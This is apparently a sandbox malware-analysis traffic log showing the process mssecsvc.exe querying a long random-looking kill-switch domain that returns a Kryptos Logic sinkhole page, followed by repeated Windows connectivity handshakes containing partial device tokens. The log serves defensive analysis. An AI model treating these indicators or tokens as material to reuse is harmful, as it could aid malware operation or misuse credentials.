                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.55063820.90.153.243443C:\Windows\mssecsvc.exe
                                                        TimestampkBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.55126720.90.153.243443C:\Windows\mssecsvc.exe
                                                        TimestampkBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.55213420.90.152.133443C:\Windows\mssecsvc.exe
                                                        TimestampkBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        5192.168.2.55331320.90.156.32443C:\Windows\mssecsvc.exe
                                                        TimestampkBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        6192.168.2.55527420.90.153.243443C:\Windows\mssecsvc.exe
                                                        TimestampkBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        7192.168.2.55786220.90.153.243443C:\Windows\mssecsvc.exe
                                                        TimestampkBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        8192.168.2.549704104.16.173.8080C:\Windows\mssecsvc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Dec 22, 2022 10:04:11.489059925 CET92OUTGET / HTTP/1.1
                                                        Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                                                        Cache-Control: no-cache


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        9104.16.173.8080192.168.2.549704C:\Windows\mssecsvc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Dec 22, 2022 10:04:11.530385971 CET93INHTTP/1.1 200 OK
                                                        Date: Thu, 22 Dec 2022 09:04:11 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 607
                                                        Connection: close
                                                        Server: cloudflare
                                                        CF-RAY: 77d7b047dffb9963-FRA
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.55032120.90.156.32443C:\Windows\mssecsvc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        2022-12-22 09:04:53 UTC0OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 30 64 61 66 33 34 64 32 34 66 62 32 39 65 36 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 246Context: 50daf34d24fb29e6
                                                        2022-12-22 09:04:53 UTC0OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                        2022-12-22 09:04:53 UTC0OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 30 64 61 66 33 34 64 32 34 66 62 32 39 65 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 35 44 2f 76 4d 34 4d 38 32 48 49 70 6d 4d 78 4e 64 41 31 51 36 59 55 6b 63 65 2b 4e 79 41 61 43 32 73 6b 4a 42 74 44 6e 30 58 6a 53 6c 42 62 6e 56 6c 75 42 2b 71 42 48 31 39 53 6f 47 51 5a 6e 6b 59 43 59 67 4e 58 36 48 71 6a 54 6f 4d 4f 69 5a 74 63 66 61 36 75 52 44 74 7a 48 39 76 30 78 61 4b 7a 7a 34 63 37 56 76 48 39 30 42 4b 61 6b 68 76 4f 41 44 31 35 70 33 33 56 55 58 62 38 64 30 46 39 44 74 71 39
                                                        Data Ascii: ATH 2 CON\DEVICE 1014Context: 50daf34d24fb29e6<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAV5D/vM4M82HIpmMxNdA1Q6YUkce+NyAaC2skJBtDn0XjSlBbnVluB+qBH19SoGQZnkYCYgNX6HqjToMOiZtcfa6uRDtzH9v0xaKzz4c7VvH90BKakhvOAD15p33VUXb8d0F9Dtq9
                                                        2022-12-22 09:04:53 UTC1OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 30 64 61 66 33 34 64 32 34 66 62 32 39 65 36 0d 0a 0d 0a
                                                        Data Ascii: BND 3 CON\QOS 29Context: 50daf34d24fb29e6
                                                        2022-12-22 09:04:53 UTC1INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2022-12-22 09:04:53 UTC1INData Raw: 4d 53 2d 43 56 3a 20 46 51 63 32 4e 4b 61 64 65 30 47 37 41 67 70 7a 52 65 44 75 42 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: FQc2NKade0G7AgpzReDuBQ.0Payload parsing failed.


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.55040420.90.156.32443C:\Windows\mssecsvc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        2022-12-22 09:04:57 UTC1OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 30 30 65 30 31 39 66 62 35 38 38 37 31 34 38 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 246Context: 600e019fb5887148
                                                        2022-12-22 09:04:57 UTC1OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                        2022-12-22 09:04:57 UTC1OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 30 30 65 30 31 39 66 62 35 38 38 37 31 34 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 35 44 2f 76 4d 34 4d 38 32 48 49 70 6d 4d 78 4e 64 41 31 51 36 59 55 6b 63 65 2b 4e 79 41 61 43 32 73 6b 4a 42 74 44 6e 30 58 6a 53 6c 42 62 6e 56 6c 75 42 2b 71 42 48 31 39 53 6f 47 51 5a 6e 6b 59 43 59 67 4e 58 36 48 71 6a 54 6f 4d 4f 69 5a 74 63 66 61 36 75 52 44 74 7a 48 39 76 30 78 61 4b 7a 7a 34 63 37 56 76 48 39 30 42 4b 61 6b 68 76 4f 41 44 31 35 70 33 33 56 55 58 62 38 64 30 46 39 44 74 71 39
                                                        Data Ascii: ATH 2 CON\DEVICE 1014Context: 600e019fb5887148<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAV5D/vM4M82HIpmMxNdA1Q6YUkce+NyAaC2skJBtDn0XjSlBbnVluB+qBH19SoGQZnkYCYgNX6HqjToMOiZtcfa6uRDtzH9v0xaKzz4c7VvH90BKakhvOAD15p33VUXb8d0F9Dtq9
                                                        2022-12-22 09:04:57 UTC2OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 30 30 65 30 31 39 66 62 35 38 38 37 31 34 38 0d 0a 0d 0a
                                                        Data Ascii: BND 3 CON\QOS 29Context: 600e019fb5887148
                                                        2022-12-22 09:04:57 UTC2INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2022-12-22 09:04:57 UTC2INData Raw: 4d 53 2d 43 56 3a 20 70 70 4f 38 68 78 76 48 7a 30 4f 59 6f 6c 4d 45 59 52 4a 34 6f 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: ppO8hxvHz0OYolMEYRJ4oQ.0Payload parsing failed.


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.55063820.90.153.243443C:\Windows\mssecsvc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        2022-12-22 09:05:08 UTC2OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 33 64 30 61 63 33 62 33 35 38 61 64 30 61 31 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 246Context: b3d0ac3b358ad0a1
                                                        2022-12-22 09:05:08 UTC2OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                        2022-12-22 09:05:08 UTC3OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 33 64 30 61 63 33 62 33 35 38 61 64 30 61 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 35 44 2f 76 4d 34 4d 38 32 48 49 70 6d 4d 78 4e 64 41 31 51 36 59 55 6b 63 65 2b 4e 79 41 61 43 32 73 6b 4a 42 74 44 6e 30 58 6a 53 6c 42 62 6e 56 6c 75 42 2b 71 42 48 31 39 53 6f 47 51 5a 6e 6b 59 43 59 67 4e 58 36 48 71 6a 54 6f 4d 4f 69 5a 74 63 66 61 36 75 52 44 74 7a 48 39 76 30 78 61 4b 7a 7a 34 63 37 56 76 48 39 30 42 4b 61 6b 68 76 4f 41 44 31 35 70 33 33 56 55 58 62 38 64 30 46 39 44 74 71 39
                                                        Data Ascii: ATH 2 CON\DEVICE 1014Context: b3d0ac3b358ad0a1<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAV5D/vM4M82HIpmMxNdA1Q6YUkce+NyAaC2skJBtDn0XjSlBbnVluB+qBH19SoGQZnkYCYgNX6HqjToMOiZtcfa6uRDtzH9v0xaKzz4c7VvH90BKakhvOAD15p33VUXb8d0F9Dtq9
                                                        2022-12-22 09:05:08 UTC4OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 33 64 30 61 63 33 62 33 35 38 61 64 30 61 31 0d 0a 0d 0a
                                                        Data Ascii: BND 3 CON\QOS 29Context: b3d0ac3b358ad0a1
                                                        2022-12-22 09:05:08 UTC4INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2022-12-22 09:05:08 UTC4INData Raw: 4d 53 2d 43 56 3a 20 75 39 47 6d 4b 55 77 46 49 45 32 74 52 76 65 73 44 57 5a 39 52 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: u9GmKUwFIE2tRvesDWZ9RQ.0Payload parsing failed.


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.55126720.90.153.243443C:\Windows\mssecsvc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        2022-12-22 09:05:30 UTC4OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 35 39 64 37 65 65 31 62 30 64 36 33 30 66 64 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 246Context: 359d7ee1b0d630fd
                                                        2022-12-22 09:05:30 UTC4OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                        2022-12-22 09:05:30 UTC4OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 35 39 64 37 65 65 31 62 30 64 36 33 30 66 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 35 44 2f 76 4d 34 4d 38 32 48 49 70 6d 4d 78 4e 64 41 31 51 36 59 55 6b 63 65 2b 4e 79 41 61 43 32 73 6b 4a 42 74 44 6e 30 58 6a 53 6c 42 62 6e 56 6c 75 42 2b 71 42 48 31 39 53 6f 47 51 5a 6e 6b 59 43 59 67 4e 58 36 48 71 6a 54 6f 4d 4f 69 5a 74 63 66 61 36 75 52 44 74 7a 48 39 76 30 78 61 4b 7a 7a 34 63 37 56 76 48 39 30 42 4b 61 6b 68 76 4f 41 44 31 35 70 33 33 56 55 58 62 38 64 30 46 39 44 74 71 39
                                                        Data Ascii: ATH 2 CON\DEVICE 1014Context: 359d7ee1b0d630fd<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAV5D/vM4M82HIpmMxNdA1Q6YUkce+NyAaC2skJBtDn0XjSlBbnVluB+qBH19SoGQZnkYCYgNX6HqjToMOiZtcfa6uRDtzH9v0xaKzz4c7VvH90BKakhvOAD15p33VUXb8d0F9Dtq9
                                                        2022-12-22 09:05:30 UTC5OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 35 39 64 37 65 65 31 62 30 64 36 33 30 66 64 0d 0a 0d 0a
                                                        Data Ascii: BND 3 CON\QOS 29Context: 359d7ee1b0d630fd
                                                        2022-12-22 09:05:30 UTC5INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2022-12-22 09:05:30 UTC5INData Raw: 4d 53 2d 43 56 3a 20 43 38 47 38 34 4e 31 67 78 30 2b 52 76 30 6f 5a 51 63 4f 53 6e 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: C8G84N1gx0+Rv0oZQcOSnA.0Payload parsing failed.


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.55213420.90.152.133443C:\Windows\mssecsvc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        2022-12-22 09:05:52 UTC5OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 37 30 37 62 38 63 61 64 33 62 33 66 66 30 33 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 246Context: 4707b8cad3b3ff03
                                                        2022-12-22 09:05:52 UTC5OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                        2022-12-22 09:05:52 UTC5OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 37 30 37 62 38 63 61 64 33 62 33 66 66 30 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 35 44 2f 76 4d 34 4d 38 32 48 49 70 6d 4d 78 4e 64 41 31 51 36 59 55 6b 63 65 2b 4e 79 41 61 43 32 73 6b 4a 42 74 44 6e 30 58 6a 53 6c 42 62 6e 56 6c 75 42 2b 71 42 48 31 39 53 6f 47 51 5a 6e 6b 59 43 59 67 4e 58 36 48 71 6a 54 6f 4d 4f 69 5a 74 63 66 61 36 75 52 44 74 7a 48 39 76 30 78 61 4b 7a 7a 34 63 37 56 76 48 39 30 42 4b 61 6b 68 76 4f 41 44 31 35 70 33 33 56 55 58 62 38 64 30 46 39 44 74 71 39
